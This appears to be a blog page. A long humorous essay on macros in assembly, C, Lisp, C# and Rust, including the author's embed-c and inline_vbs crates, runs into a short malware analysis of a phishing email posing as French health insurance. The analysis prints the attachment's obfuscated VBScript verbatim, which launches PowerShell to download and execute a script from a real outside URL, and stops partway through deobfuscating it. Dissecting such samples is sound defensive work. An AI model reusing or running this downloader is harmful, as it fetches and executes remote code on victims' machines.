How I Learned to Stop Worrying and Love Macros

Rust macros are powerful, that's a fact. I mean, they allow running any code at compile-time, of course they're powerful.

C macros, which are at the end of the day nothing more than glorified text substitution rules, allow you to implement new, innovative, modern language constructs, such as:

#define ever (;;)
for ever { 
   ...
}
https://stackoverflow.com/a/652802/2196124

or even:

#include <iostream>
#define System S s;s
#define public
#define static
#define void int
#define main(x) main()
struct F{void println(char* s){std::cout << s << std::endl;}};
struct S{F out;};

public static void main(String[] args) {
  System.out.println("Hello World!");
}
https://stackoverflow.com/a/653028/2196124

But these are just silly examples written for fun. Nobody would ever commit such macro abuse in real-world, production code. Nobody...

/*	mac.h	4.3	87/10/26	*/

/*
 *	UNIX shell
 *
 *	S. R. Bourne
 *	Bell Telephone Laboratories
 *
 */
 
...

#define IF	if(
#define THEN	){
#define ELSE	} else {
#define ELIF	} else if (
#define FI	;}

#define BEGIN	{
#define END	}
#define SWITCH	switch(
#define IN	){
#define ENDSW	}
#define FOR	for(
#define WHILE	while(
#define DO	){
#define OD	;}
#define REP	do{
#define PER	}while(
#undef DONE
#define DONE	);
#define LOOP	for(;;){
#define POOL	}

...

ADDRESS alloc(nbytes)
    POS     nbytes;
{
    REG POS rbytes = round(nbytes+BYTESPERWORD,BYTESPERWORD);

    LOOP    INT     c=0;
    REG BLKPTR  p = blokp;
    REG BLKPTR  q;
    REP IF !busy(p)
        THEN    WHILE !busy(q = p->word) DO p->word = q->word OD
        IF ADR(q)-ADR(p) >= rbytes
        THEN    blokp = BLK(ADR(p)+rbytes);
            IF q > blokp
            THEN    blokp->word = p->word;
            FI
            p->word=BLK(Rcheat(blokp)|BUSY);
            return(ADR(p+1));
        FI
        FI
        q = p; p = BLK(Rcheat(p->word)&~BUSY);
    PER p>q ORF (c++)==0 DONE
    addblok(rbytes);
    POOL
}
I'm sorry.

This bit of code is taken directly from the original Bourne shell code, from a 4.3BSD-Tahoe source code archive. Steve Bourne was an Algol 68 fan, so he tried to make C look more like it.

But Rust macros ain't like that.

What are Rust macros?

That's a good question. I've got a better one for you:

What are macros?

Macros, at the simplest level, are just things that do other things quicker (for the user) than by manually doing said things.

This definition encompasses quite a lot of features you've probably already encountered. Of course, if you're a developer, hearing "macro" often triggers a fight-or-flight response, deeply rooted in a bad experience with C preprocessor macros. If you're a Microsoft Office power user, "macros" are probably the first thing you're taught to be afraid of (second only to "moving a picture in a Word document"), thanks in part to the large amount of malware that used VBA macros to propagate in the early 2000s. This definition even includes the simple, "key-sequence" macros that a lot of programs allowed you to record and bind to keys.

I use the past tense here, because this trend wore off quite long ago, around the same time we stopped seeing MDI interfaces.

These have pretty much disappeared, replaced by tabs and docking UIs

Back on topic. This is about programming, so the macros we're talking about are the ones we find in programming languages. Even though the C ones are the most famous (because there's no other language where there are so few built-in constructs that you have to write macros at one point or another), they weren't the first ones.

A Brief History of Macros

In the early 1950s, if you wanted to write a program for your company's mainframe computer, your choices were more limited than today, language-wise. "Portable" languages (Fortran, COBOL, eventually Algol) were a new concept, so basically everything serious was written in whatever machine language your computer understood. Of course, you didn't write the machine language directly: you used what was, and still is, called an assembler to translate a textual representation into the raw numeric code you'd then pass on to the mainframe using punch cards or whatnot.

After some time, assemblers started providing ways to declare "shortcuts" for other bits of code. I'll make a bit of an anachronism here by writing x86 assembly targeting Linux. Let's say you want to make a simple "Hello World" program:

section .text						; text segment (code)
	mov eax, 4 						; syscall (4 = write)
	mov ebx, 1 						; file number (1 = stdout)
	mov ecx, message				; string to write
	mov edx, length					; length of string
	int 80h							; call kernel

section .data
	message db 'Hello World', 0xA	; d(efine) b(yte) for the string, with newline
    length equ $ - message			; length is (current position) - (start)

Don't worry if you don't fully understand the code above, it's not the point. Here, writing a string takes 5 whole lines (filling up the 4 parameters and then calling the kernel). Compare this to Python:

print("Hello World")

If only there were a way to tell the assembler that those five lines are really one single operation, that we may want to do often...

%macro print 2		; define macro "print" with 2 parameters
	mov eax, 4
	mov ebx, 1
	mov ecx, %1		; message is first parameter
	mov edx, %2		; length is second parameter
	int 80h	
%endmacro

section .text
	print message1, length1
	print message2, length2
    
section .data
	message1 db 'Hello World', 0xA
	length1 equ $ - message1
    
	message2 db 'Simple macros', 0xA
	length2 equ $ - message2

Here, the "macro" is just performing simple text substitution. When you write print foo, bar, the assembler replaces the line with everything between %macro and %endmacro, all while also replacing every occurrence of %N with the value of the corresponding parameter. This is the most common kind of macro, and is pretty much what you get in C:

#define PRINT(message, length) write(STDOUT_FILENO, message, length)
Don't do this in C.
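To make "simple text substitution" concrete, here is a minimal sketch in Rust of what such an expander does with the body of the print macro. The expand function is a hypothetical helper written for this illustration; a real assembler's macro processor handles far more (labels, defaults, nesting).

```rust
/// Expands a macro body by plain text substitution: every `%N` in `body`
/// is replaced with the N-th argument (1-based).
/// Hypothetical helper for illustration only.
fn expand(body: &str, args: &[&str]) -> String {
    let mut out = body.to_string();
    // Walk from the highest index down so that `%10` is replaced before `%1`.
    for (i, arg) in args.iter().enumerate().rev() {
        out = out.replace(&format!("%{}", i + 1), *arg);
    }
    out
}

fn main() {
    let body = "mov eax, 4\nmov ebx, 1\nmov ecx, %1\nmov edx, %2\nint 80h";
    // Equivalent of writing `print message1, length1` in the assembly source.
    println!("{}", expand(body, &["message1", "length1"]));
}
```

Note that the expander has no idea what the text means: it would happily substitute into a comment, a string or the middle of an identifier.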

Too good to be true

Obviously, it has limitations. What if, in assembly, you did this:

mov eax, 42		; just storing something in eax
print foo, bar	; just printing my message
mov ebx, eax	; where's my 42 at?

Unbeknownst to you, the print macro modified the value of the eax register, so the value you wrote isn't there anymore!

What if, in C, you did this:

#define SWAP(a, b) int tmp = a;	\
                   a = b;		\
                   b = tmp;

int main() {
	int tmp = 123;
    // ...
	int x = 5, y = 6;
    SWAP(x, y); // ERROR: a variable named 'tmp' already exists
}

Here, there's a conflict between the lexical scope of the function (main) and the macro (SWAP). Short of using names like __macro_variable_dont_touch_tmp in your macros, there's not much you can do to entirely prevent problems like this. What about this:

int main() {
	int x = 5, y = 6, z = 7;
    int test = 100;

	if (test > 50)
    	SWAP(x, y);
    else
    	SWAP(y, z);
}

The above code does not compile. It walks like correct code and quacks like correct code, but here's what it looks like after macro-expansion:

int main() {
	int x = 5, y = 6, z = 7;
    int test = 100;

	if (test > 50)
    	int tmp = x;
        x = y;
        y = tmp;
    else
    	int tmp = y;
        y = z;
        z = tmp;
}

Braceless ifs must contain exactly one statement, but here there are 3 of them! Let's fix it:

#define SWAP(a, b) {int tmp = a;	\
                   a = b;			\
                   b = tmp;}

Now, it should work, shouldn't it? Nope, still broken!

if (test > 50)
   	{int tmp = x;
    x = y;
    y = tmp;};
else
   	{int tmp = y;
    y = z;
    z = tmp;};

Not seeing it? Let me reformat it for you:

if (test > 50) {
   	int tmp = x;
   	x = y;
  	y = tmp;
}
;
else
   	...

Since we're writing SWAP(x, y); there's a semicolon hanging right there, after the code block, so the else is not connected to the if anymore. The solution, obviously, is to do:

#define SWAP(a, b) do{int tmp = a;		\
                   a = b;				\
                   b = tmp;}while(0)

Here, the expanded code is equivalent to the one we had before, but requires a semicolon afterwards, so the compiler is happy.

Another simple example is

#define MUL(expr1, expr2) expr1 * expr2

int res = MUL(2 + 3, 4 + 5);

This gets expanded to

int res = 2 + 3 * 4 + 5; // bang!

Macros have no knowledge of concepts such as "expressions" or "operator precedence", so you have to resort to tricks like adding parentheses everywhere:

#define MUL(expr1, expr2) ((expr1) * (expr2))
But... it's broken? There's no reason anyone should have to do this sort of syntax wizardry just to get a multiline macro or a macro processing expressions to work!

A few years ago, in the 1960s to be precise, some smart guys in a lab realized that "just replace bits of text by other bits of text" was not, bear with me, the best way to do macros. What if, instead of performing modifications on the textual form of the code, the macros could work on an abstract representation of the code, and likewise produce their output in that same representation?

SaaS (Software as an S-expression)

This is a Lisp program (and its output):

> (print (+ 1 2))
3

Lisp (for LISt Processing) has a funny syntax. In Lisp, things are either atoms or lists. An atom, as its name implies, is something "not made of other things". Examples include numbers, strings, booleans and symbols. A list, well, it's a list of things. A list being itself a thing, you can nest lists. This is a list containing various things (don't try to run it, it's not a full program):

(one ("thing" or) 2 "inside" a list)

You may notice that this looks awfully like the program I wrote earlier; it's not luck: one of Lisp's basic tenets is that programs are just data. A function call, that most languages would write f(x, y) can simply be encoded as a list: (f x y).

The technical term for a "thing" (something that is either an atom or a list, with lists written with parentheses and stuff) is s-expression.

When you give Lisp an expression, it tries to evaluate it. An atom evaluates to itself. A list is evaluated by looking at its first element, which must be a function, and calling it with the rest of the list (each element being evaluated in turn) as its parameters. You can tell Lisp not to evaluate something by wrapping it in quote.

> (+ 4 5)
9
> (quote (+ 4 5))
(+ 4 5)

In the end, you get code like this:

> (print (length (quote (a b c d))))
4

(print... and (length... are evaluated, but (a... is kept as is, because it's really a list, not a bit of code.

The opposite of quote is called eval:

> (quote (+ 4 5))
(+ 4 5)
> (eval (quote (+ 4 5)))
9

Through this simple mechanic, Lisp allows you to modify programs dynamically as if they were any other data you can manipulate – because they really are any other data you can manipulate.
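For readers more at home in Rust than in Lisp, the same idea can be sketched with an enum. This is only an illustration under heavy assumptions: SExpr, sym and eval are names made up for this example, and the evaluator knows only numbers, +, * and quote.

```rust
// A minimal sketch of "programs are just data"; all names are hypothetical.
#[derive(Debug, Clone, PartialEq)]
enum SExpr {
    Num(i64),         // an atom: a number
    Sym(String),      // an atom: a symbol such as `+` or `quote`
    List(Vec<SExpr>), // a list of other s-expressions
}

fn sym(name: &str) -> SExpr {
    SExpr::Sym(name.to_string())
}

/// Evaluates an s-expression. Only numbers, `+`, `*` and `quote` are supported.
fn eval(expr: &SExpr) -> Result<SExpr, String> {
    match expr {
        SExpr::Num(n) => Ok(SExpr::Num(*n)), // a number evaluates to itself
        SExpr::Sym(s) => Err(format!("unbound symbol: {}", s)),
        SExpr::List(items) => {
            let (head, args) = items
                .split_first()
                .ok_or_else(|| "cannot evaluate an empty list".to_string())?;
            match head {
                // `quote` returns its argument without evaluating it.
                SExpr::Sym(op) if op == "quote" => args
                    .first()
                    .cloned()
                    .ok_or_else(|| "quote needs one argument".to_string()),
                SExpr::Sym(op) if op == "+" || op == "*" => {
                    let mut acc: i64 = if op == "+" { 0 } else { 1 };
                    for arg in args {
                        // Arguments are evaluated before being combined.
                        match eval(arg)? {
                            SExpr::Num(n) if op == "+" => acc += n,
                            SExpr::Num(n) => acc *= n,
                            other => return Err(format!("not a number: {:?}", other)),
                        }
                    }
                    Ok(SExpr::Num(acc))
                }
                other => Err(format!("not a function: {:?}", other)),
            }
        }
    }
}

fn main() {
    // (+ 4 5)
    let code = SExpr::List(vec![sym("+"), SExpr::Num(4), SExpr::Num(5)]);
    println!("{:?}", eval(&code));

    // (quote (+ 4 5)) evaluates to the list itself, which can be evaluated again.
    let quoted = SExpr::List(vec![sym("quote"), code.clone()]);
    let data = eval(&quoted).unwrap();
    println!("{:?} -> {:?}", data, eval(&data));
}
```

The point is that code and quoted hold the same kind of value: a program is a Vec you can build, inspect and rewrite before handing it to eval.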

Let's rewrite our MUL macro from before. I'll define a function which takes two parameters, and returns code that multiplies them.

> (define (mul expr1 expr2)
  	(list (quote *) expr1 expr2)) ; * is quoted so it appears verbatim in the output
> (mul (+ 2 3) (+ 4 5))
  	(* 5 9)

That's not exactly what I want, since I don't want the operands to be evaluated right at the beginning, so I'll quote them:

> (mul (quote (+ 2 3)) (quote (+ 4 5)))
  	(* (+ 2 3) (+ 4 5))
> (eval (mul (quote (+ 2 3)) (quote (+ 4 5))))
  	45

You'll notice right away that we don't have any operator precedence problem like we had in C. But we do have problems: we have to put (quote ...) around every operand to prevent it from being evaluated, and we have to (eval ...) the result to really run the code that was produced. Since these steps are quite common, they were abstracted away in a language builtin called define-macro:

> (define-macro (mul expr1 expr2)
  	(list (quote *) expr1 expr2))
> (mul (+ 2 3) (+ 4 5))
  	45

Here's what the SWAP macro would look like:

(define-macro (swap var1 var2)
  	(quasiquote 
    	(let ((tmp (unquote var1)))
    		(set! (unquote var1) (unquote var2))
        	(set! (unquote var2) tmp))))

I'm using functions I haven't talked about yet. quasiquote does the same thing as quote, that is, return its argument without evaluating it, except that if you write (unquote ...) somewhere in it, the argument of unquote is inserted evaluated. You don't have to understand this, only that all of these tools are, in the end, nothing more than syntactic sugar for manipulating lists.

set! is just what you use to change a variable's value.

That's cheating, Lisp isn't a real language anyway

I mean, obviously. Real languages have syntaxes way more complex than lists of things. When you look at a real program written in a real language, for example C, you don't see a list. You see blocks, declarations, statements, expressions.

int factorial(int x) // function signature
{ // code block
	if (x == 0) // conditional statement
    {
    	return 1; // return statement
    } 
    else 
    {
    	return x * factorial(x - 1); // expression, function call
    }
}

Well...

(define (factorial x)
	(if (zero? x)
    	1
        (* x (factorial (- x 1)))))

Or, linearly:

(define (factorial x) (if (zero? x) 1 (* x (factorial (- x 1)))))
That's a list if I've ever seen one

When a compiler or interpreter reads a program, it does something called parsing. It reads a sequence of characters (letters, digits, punctuation, ...) and converts it (this is the non-trivial part) into something it can process more easily.

Think about it, when you read the block of C code above, you don't read a sequence of letters and symbols. You see that it's a function declaration, with a return type, a name, a list of parameters and a body. Each parameter has a name and a type, and the body is a code block containing an if-statement, itself containing more code.

A data structure that stores things that are either atomic or made of other things is called a tree. Lisp lists (try saying that out loud quickly) can contain atoms or other lists, they're just one way of encoding trees.

Here, we're using a tree to store a program's source code, which is text, but we know that the code respects a set of rules, called the syntax. Oh, and we abstract away non-essential details like whitespace, parentheses and whatnot.

We might as well call that an Abstract Syntax Tree! (a.k.a. AST)

[Diagram: AST of the factorial function]

Function declaration 'factorial'
    Return type: Type 'int'
    Parameters: Parameter list
        Parameter 'x'
            Type: Type 'int'
    Body: 'If' statement
        Condition: Binary operation '=='
            Operand 1: Variable 'x'
            Operand 2: Constant 0
        If true: [code if true]
        If false: [code if false]

I've omitted some details from the diagram above for the sake of brevity, but you get the idea. Code (text) becomes code (tree), and code (tree) matches more closely the mental idea we have of what code (text) means.
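To show what "code (tree)" can look like in a language that isn't made of lists, here is a rough Rust sketch of an AST for the factorial function, with a tiny tree-walking evaluator. The node types (Expr, Op, Function) are invented for this example, and the C if/return pair is simplified into a single conditional expression; no real compiler uses exactly this shape.

```rust
// Hypothetical node types for a tiny C-like language; illustration only.
#[derive(Debug, Clone, Copy)]
enum Op { Eq, Mul, Sub }

#[derive(Debug)]
enum Expr {
    Const(i64),
    Var(String),
    Binary { op: Op, lhs: Box<Expr>, rhs: Box<Expr> },
    Call { callee: String, arg: Box<Expr> },
    If { cond: Box<Expr>, then: Box<Expr>, otherwise: Box<Expr> },
}

#[derive(Debug)]
struct Function { name: String, param: String, body: Expr }

fn var(name: &str) -> Box<Expr> { Box::new(Expr::Var(name.to_string())) }
fn constant(n: i64) -> Box<Expr> { Box::new(Expr::Const(n)) }
fn binary(op: Op, lhs: Box<Expr>, rhs: Box<Expr>) -> Box<Expr> {
    Box::new(Expr::Binary { op, lhs, rhs })
}

/// Builds the tree for: if (x == 0) 1 else x * factorial(x - 1)
fn factorial_ast() -> Function {
    Function {
        name: "factorial".to_string(),
        param: "x".to_string(),
        body: Expr::If {
            cond: binary(Op::Eq, var("x"), constant(0)),
            then: constant(1),
            otherwise: binary(
                Op::Mul,
                var("x"),
                Box::new(Expr::Call {
                    callee: "factorial".to_string(),
                    arg: binary(Op::Sub, var("x"), constant(1)),
                }),
            ),
        },
    }
}

/// Walks the tree and computes its value, with `x` bound to the parameter.
fn eval(f: &Function, expr: &Expr, x: i64) -> i64 {
    match expr {
        Expr::Const(n) => *n,
        Expr::Var(name) => {
            assert_eq!(name, &f.param, "unknown variable");
            x
        }
        Expr::Binary { op, lhs, rhs } => {
            let (l, r) = (eval(f, lhs, x), eval(f, rhs, x));
            match op {
                Op::Eq => (l == r) as i64,
                Op::Mul => l * r,
                Op::Sub => l - r,
            }
        }
        Expr::Call { callee, arg } => {
            assert_eq!(callee, &f.name, "unknown function");
            eval(f, &f.body, eval(f, arg, x))
        }
        Expr::If { cond, then, otherwise } => {
            if eval(f, cond, x) != 0 { eval(f, then, x) } else { eval(f, otherwise, x) }
        }
    }
}

fn main() {
    let f = factorial_ast();
    println!("factorial(5) = {}", eval(&f, &f.body, 5));
}
```

Whitespace, braces and semicolons are nowhere to be found in the tree: only the structure survives, which is exactly what a macro system working on trees gets to manipulate.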

We reach the same conclusion we had with Lisp: code is data. The only difference is that in Lisp, you can really take code and turn it into data, it's "built-in", whereas there's nothing in C for that. The main reason is that code is a weird kind of data. Numbers are simple; arrays, a bit more convoluted but still simple; code is hard to reason about. Trees and stuff. Lisp is built around dynamic lists, so it's easy. C is built around human suffering, it's definitely not made for manipulating code. I mean, imagine writing a parser, or even a compiler in C.

Being able to manipulate code from code is called metaprogramming, and few languages have it built-in. Lisp does it, because it's Lisp. C# does it too, albeit only for a (large enough) subset of the language, with what they call "expression trees":

void Swap<T>(Expression<Func<T>> a, Expression<Func<T>> b)
{
	var tmp = Expression.Parameter(typeof(T));
	var code = Expression.Lambda(
		Expression.Block(new [] { tmp }, 		// T tmp;
			Expression.Assign(tmp, a.Body),		// tmp = [a];
			Expression.Assign(a.Body, b.Body),	// [a] = [b];
			Expression.Assign(b.Body, tmp)));	// [b] = tmp;
	var compiled = (Func<T>) code.Compile();
	compiled();
}

class Foo
{
	public int A;
	public int B;
}

var obj = new Foo { A = 123, B = 456 };
Swap(() => obj.A, () => obj.B);

It's a bit more complicated than in Lisp, because here, the way to achieve what we did with quote (i.e., pass an unevaluated expression to a function) involves declaring a parameter with the Expression<T> type, with T being a function type. This means that you can't pass any expression directly, you must pass a function returning that expression (hence the () =>).

We don't have eval either, instead we can compile an expression we built into a real function we can then call (and it's that call that does what eval would do in Lisp in that context).

Building code is also more complicated: since C# code is not made of lists, you can't just create a sequence of things and call it a day, code here is stored as objects ("expression trees") that you build using functions such as Expression.Assign or Expression.Block.

All of this also means that only a subset of the language is available through this feature: you can't have classes in functions, for example. At the end of the day, it's not really a problem, most problems solved by macros are solved through other means in C#, and this metaprogramming-like expression tree wizardry is almost only ever used in contexts where only simple expressions will be used.

Long Recaps Considered Harmful

3,000! If you're still there, you've just read 3,000 words of me rambling about old languages and weird compiler theory terminology. This post was supposed to be about Rust macro abuse.

Rust has macros. Twice.

Rust supports two kinds of macros: declarative macros and procedural macros.

Declarative macros are a bit like C macros, in that they can be quite easy to write, although in Rust they are much less error-prone. See for yourself:

macro_rules! swap {
    ($a:expr, $b:expr) => { 
        let tmp = $a;
        $a = $b;
        $b = tmp;
    };
}

fn main() {
    let (mut a, mut b) = (123, 456);
    swap!(a, b);
    println!("a={} b={}", a, b);
}

macro_rules! mul {
	($a:expr, $b:expr) => {
    	$a * $b
    };
}

fn main() {
	println!("{}", mul!(2 + 3, 4 + 5)); // no operator precedence issue
}
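To tie this back to the C pitfalls from earlier, here is a small sketch reusing the same swap! macro in the two situations that broke SWAP: a caller that already has its own tmp, and an if/else. The demo function and its values are made up for this illustration.

```rust
macro_rules! swap {
    ($a:expr, $b:expr) => {
        let tmp = $a;
        $a = $b;
        $b = tmp;
    };
}

/// Returns (tmp, x, y, z) after a couple of swaps.
fn demo() -> (i32, i32, i32, i32) {
    let tmp = 123; // same name as the macro's temporary
    let (mut x, mut y, mut z) = (5, 6, 7);

    // Same scope as our own `tmp`: the macro's `tmp` is a distinct binding
    // thanks to hygiene, so nothing is redeclared or overwritten.
    swap!(x, y);

    // Rust requires braces around if/else bodies, so there is no dangling
    // `else` to worry about and no need for a do { ... } while (0) trick.
    if tmp > 50 {
        swap!(y, z);
    } else {
        swap!(x, z);
    }

    (tmp, x, y, z)
}

fn main() {
    println!("{:?}", demo());
}
```

The caller's tmp still holds 123 at the end, even though the macro declared a variable with the same name in the same scope.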

Declarative macros can operate on various parts of a Rust program, such as expressions, statements, blocks, or even specific token types, such as identifiers or literals. They can also operate on raw token trees, which allow for interesting code manipulation techniques. But even though they work in a cleaner way and support advanced patterns, with repetitions and optional parameters, they're just a more advanced form of substitution. So, closer to C macros.
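As a quick illustration of repetitions and optional parts, here is a sketch of a variadic max! macro. The macro name and its exact pattern are my own choices for this example, not something from the standard library.

```rust
// `$(, $rest:expr)*` matches zero or more extra comma-separated expressions,
// and `$(,)?` accepts an optional trailing comma.
macro_rules! max {
    ($first:expr $(, $rest:expr)* $(,)?) => {{
        let mut best = $first;
        // This block is repeated once per extra argument.
        $(
            let candidate = $rest;
            if candidate > best {
                best = candidate;
            }
        )*
        best
    }};
}

fn main() {
    println!("{}", max!(3, 9, 4));
    println!("{}", max!(2 + 3, 4 + 5,)); // trailing comma is fine
    println!("{}", max!(7));
}
```

The double braces make the expansion a single block expression, so max! can be used anywhere a value is expected, and each argument is evaluated exactly once.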

Procedural macros, on the other hand, are more like Lisp macros. They're written in Rust, get passed a token stream (a list of tokens from the source code) and are expected to give one back to the compiler. Apart from that, they can do basically anything.

They look like this:

#[proc_macro]
pub fn macro_name(input: TokenStream) -> TokenStream {
    todo!()
}

They're often used for code generation, such as generating methods from a struct definition:

#[derive(Debug)]
struct Person {
	name: String,
    age: u8
}

This generates an implementation of the Debug trait for the Person type, which contains the code needed to get a pretty-printed, human-readable version of any Person value. Likewise, derive(PartialEq) and derive(PartialOrd) generate equality and ordering methods, and so on.
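Here is a short sketch of what using those derived implementations looks like in practice. The sample values are made up; the only assumption is that Clone, PartialEq and PartialOrd are derived alongside Debug.

```rust
#[derive(Debug, Clone, PartialEq, PartialOrd)]
struct Person {
    name: String,
    age: u8,
}

fn main() {
    let alice = Person { name: "Alice".to_string(), age: 30 };
    let bob = Person { name: "Bob".to_string(), age: 25 };

    // Derived Debug: `{:?}` is the compact form, `{:#?}` the multi-line one.
    println!("{:?}", alice);
    println!("{:#?}", bob);

    // Derived PartialEq compares field by field.
    assert!(alice == alice.clone());
    assert!(alice != bob);

    // Derived PartialOrd compares fields in declaration order,
    // so `name` is compared before `age`.
    assert!(alice < bob);
}
```

None of these methods were written by hand: the compiler runs the derive macros on the struct definition and appends the generated impl blocks.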

But there are less... orthodox uses for procedural macros.

Mara Bos famously wrote some interesting crates – the first one, inline_python, allows running Python code from Rust seamlessly, with bidirectional interaction (for variables):

use inline_python::python;

fn main() {
    let who = "world";
    let n = 5;
    python! {
        for i in range('n):
            print(i, "Hello", 'who)
        print("Goodbye")
    }
}

I highly recommend reading her blogpost series on the subject where she goes deep in detail on how to implement such a macro. It involves a lot of subtle tricks needed to deal with how the Rust compiler reads and tokenizes code, how errors can be mapped from Python to Rust, etc.

She also wrote whichever_compiles, which runs multiple instances of the compiler to find... whichever bit of code compiles, among a list you provide:

use whichever_compiles::whichever_compiles;

fn main() {
    whichever_compiles! {
        try { thisfunctiondoesntexist(); }
        try { invalid syntax 1 2 3 }
        try { println!("missing arg: {}"); }
        try { println!("hello {}", world()); }
        try { 1 + 2 }
    }
}

whichever_compiles! {
    try { }
    try { fn world() {} }
    try { fn world() -> &'static str { "world" } }
}

The macro forks the compiler process, at compile-time, and each child process tries one of the branches. The first one to compile wins, and the winning branch is used for the rest of the build process.

After a series of unfortunate events, I was informed of the existence of procedural macros, and decided that I had to make one. After some nights of work, I brought to the world embed-c, the first procedural macro to allow anyone to write pure, unadulterated C code in the middle of a Rust code file. Complete with full interoperability with the Rust code, obviously. This has made a lot of people very angry and been widely regarded as a bad move.

use embed_c::embed_c;

embed_c! {
    int add(int x, int y) {
        return x + y;
    }
}

fn main() {
    let x = unsafe { add(1, 2) };
    println!("{}", x);
}

It uses a library called C2Rust which, really, is what it sounds like. It's a toolset that relies on Clang to parse and analyze C code, and generates equivalent (in behavior) Rust code. Obviously, the generated code is not idiomatic, and quickly becomes unreadable if you use enterprise-grade C control flow features such as goto. But can Rust really replace C in the industry without a proper implementation of Duff's device?

embed_c! {
    void send(to, from, count)
        register short *to, *from;
        register count;
    {
        register n = (count + 7) / 8;
        switch (count % 8) {
        case 0: do { *to++ = *from++;
        case 7:      *to++ = *from++;
        case 6:      *to++ = *from++;
        case 5:      *to++ = *from++;
        case 4:      *to++ = *from++;
        case 3:      *to++ = *from++;
        case 2:      *to++ = *from++;
        case 1:      *to++ = *from++;
                } while (--n > 0);
        }
    }
}

fn main() {
    let mut source = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10];
    let mut dest = [0; 10];
    unsafe { send(dest.as_mut_ptr(), source.as_mut_ptr(), 10); };
    assert_eq!(source, dest);
}

After seeing Mara's inline_python crate, I was taken aback by her choice of such an outdated language – Python was created in 1991!

VBScript, first released in 1996, is a much more modern language than Python. It provides transparent COM interoperability, is supported out-of-the-box on every desktop version of Windows since 98 – even Windows CE on ARM is supported; and it has been since 2000, whereas Python won't run on Windows ARM until 3.11 (2022).

As such, I had no other choice but to create inline_vbs, for all your daily VBS needs.

use inline_vbs::*;

fn main() {
    vbs![On Error Resume Next]; // tired of handling errors?
    vbs![MsgBox "Hello, world!"];
    if let Ok(Variant::String(str)) = vbs_!["VBScript" & " Rocks!"] {
        println!("{}", str);
    }
}

It relies on the Active Scripting APIs, which were originally designed to allow vendors to add scripting support to their software, and it's actually a nice idea. You can have multiple language providers, and a program relying on the AS APIs would automatically support all installed languages. The most common were JScript and VBScript, because they were installed by default on Windows, but you could add support for Perl, REXX or even Haskell. Haskell! Think about it. This means that on a computer with the Haskell provider installed, this bit of code would be valid and would kinda work in Internet Explorer:

<HTML>
    <HEAD>
        <TITLE>Active Scripting demo</TITLE>
    </HEAD>
    <BODY>
        <H1>Welcome!</H1>
        <SCRIPT LANGUAGE="HASKELL">
            main :: IO ()
            main = putStrLn "Hello World"
        </SCRIPT>
    </BODY>
</HTML>

One major pain point is that VBScript, like Python, is a dynamic language, where values can change type, something that statically-typed languages like Rust are proud to say they do not like at all, thank you very much.

Since VBScript is handled through COM APIs, values are transferred using the VARIANT COM type, which is pretty much a giant union of every COM type under the sun. Luckily, this matches up perfectly with Rust's discriminated unions – I take it as a sign from the universe that Rust and VBScript were made to work together.
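To give an idea of why the two fit together, here is a simplified sketch of a VARIANT-like type as a Rust enum. This is a hypothetical stand-in with a handful of cases, not the actual definition used by inline_vbs, and the real VARIANT has many more members.

```rust
// Hypothetical, heavily simplified model of a COM VARIANT.
// The tag (which case is active) and the payload travel together.
#[derive(Debug, Clone, PartialEq)]
enum Variant {
    Empty,
    Null,
    Bool(bool),
    I32(i32),
    F64(f64),
    String(String),
}

/// Describes a value; `match` forces every case to be handled.
fn describe(value: &Variant) -> String {
    match value {
        Variant::Empty => "empty".to_string(),
        Variant::Null => "null".to_string(),
        Variant::Bool(b) => format!("boolean {}", b),
        Variant::I32(n) => format!("32-bit integer {}", n),
        Variant::F64(x) => format!("double {}", x),
        Variant::String(s) => format!("string {:?}", s),
    }
}

fn main() {
    let values = [
        Variant::String("VBScript Rocks!".to_string()),
        Variant::I32(42),
        Variant::Bool(true),
        Variant::Empty,
    ];
    for value in &values {
        println!("{}", describe(value));
    }
}
```

A dynamically typed value coming back from a script can land in whichever case matches its runtime type, and the Rust side decides what to do with it through pattern matching, as in the if let Ok(Variant::String(str)) line above.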

That's pretty much it for today.

Quick analysis of a virus

I just received a spam e-mail impersonating the French social security ("Assurance Maladie"), which tells me to download my tax statement which they have graciously attached.

There are multiple things to notice here:

  • the sender address: [email protected]
  • onmicrosoft.com is used by Office 365 addresses, so they probably used Azure or something like that
  • the whole message is a picture, probably a screenshot of a real e-mail. Well, at least that way they don't write a fake message in broken Google-Translated French

Now, the attachments.

No PDF file. That's unusual, since PDFs are quite common in this kind of spam. But rejoice! We have a VBScript file right there.

(the CSV file and the .bin file don't contain anything interesting, or at least I didn't find anything interesting in them)

Here is the VBS file, raw as I received it:

on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:JPHgjNP = replace("WiDDXetmcript.iDDXetmhEll","iDDXetm","s"):Set cfAKtQG = CreateObject(JPHgjNP ):izZHSpc = Replace("POWlZsTwIURSHlZsTwIULL","lZsTwIU","E"):WScript.Sleep 2000:WScript.Sleep 2000:cfAKtQGcfAKtQGNXPDFLW = "  $00Q1KNH<##>='(New-';[<##>System.Threading.Thread<##>]::Sleep(2300);$AD77UAZ<##> = '!!!!!!!!!!!! '.Replace(<##>'!!!!!!!!!!!!'<##>,'Object'<##>);<##>$UDKKQV0 <##>= <##>'Net'<##>;<##>$E6IWW9R<##> = <##>'.We';[<##>System.Threading.Thread<##>]::Sleep(2300);<##>$G4OKYRL<##>='.Downlo';<##>$ZT2X8YH<##> = <##>'bClient)';<##>$OOK2YVD=<##>'adString(''https://cursosinf.webs.upv.es/wp-includes//js/jcrop/4.txt'')'<##>;<##>[<##>System.Threading.Thread<##>]::Sleep(2300);$8ZRVUBH<##>=I`E`X (<##>$00Q1KNH<##>,<##>$AD77UAZ<##>,<##>$UDKKQV0<##>,<##>$E6IWW9R<##>,<##>$ZT2X8YH<##>,<##>$G4OKYRL<##>,$OOK2YVD<##> <##>-Join <##>''<##>)<##>|I`E`X":cfAKtQG.Run(izZHSpc+cfAKtQGcfAKtQGNXPDFLW+""),0,True:Set cfAKtQG = Nothing

Quite unreadable, if you ask me. Here it is after replacing all the : separators with line breaks, evaluating the replace( calls and merging all the strings together:

on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
WScript.Sleep 2000
WScript.Sleep 2000
